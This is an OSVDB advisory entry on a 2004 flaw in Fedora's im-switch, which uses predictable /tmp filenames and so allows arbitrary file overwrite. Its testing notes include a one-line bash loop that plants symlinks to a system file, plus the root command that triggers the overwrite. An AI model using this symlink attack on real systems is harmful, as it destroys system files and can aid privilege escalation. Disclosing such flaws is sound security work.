Fedora im-switch Arbitrary File Overwrite

2004-06-29T07:26:54
ID OSVDB:7772
Type osvdb
Reporter SEKINE Tatsuo()
Modified 2004-06-29T07:26:54

Description

Vulnerability Description

Fedora contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the im-switch command uses a predictable filename in the /tmp directory which may allow an attacker to overwrite arbitrary files. This flaw may lead to a loss of integrity.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Red Hat has released a patch to address this vulnerability.

Short Description

Fedora contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the im-switch command uses a predictable filename in the /tmp directory which may allow an attacker to overwrite arbitrary files. This flaw may lead to a loss of integrity.

Manual Testing Notes

Steps to Reproduce: 1. an attacker who has only normal privilege types as followed:

$ bash -c 'i=1;while [ $i -lt 65536 ]; do ln -s /etc/IMPORTANT_FILE /tmp/imswitcher$i; let "i++"; done'

  1. root types below to set system-wide IM setting:

# /usr/bin/im-switch -w -m xim

3.

Actual Results: /etc/IMPORTANT_FILE becomes broken.

References:

Secunia Advisory ID:12037 Packet Storm: http://packetstormsecurity.org/0407-advisories/fedora_im-switch_tempfile_race.txt Other Advisory URL: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=126940 ISS X-Force ID: 16682 Bugtraq ID: 10717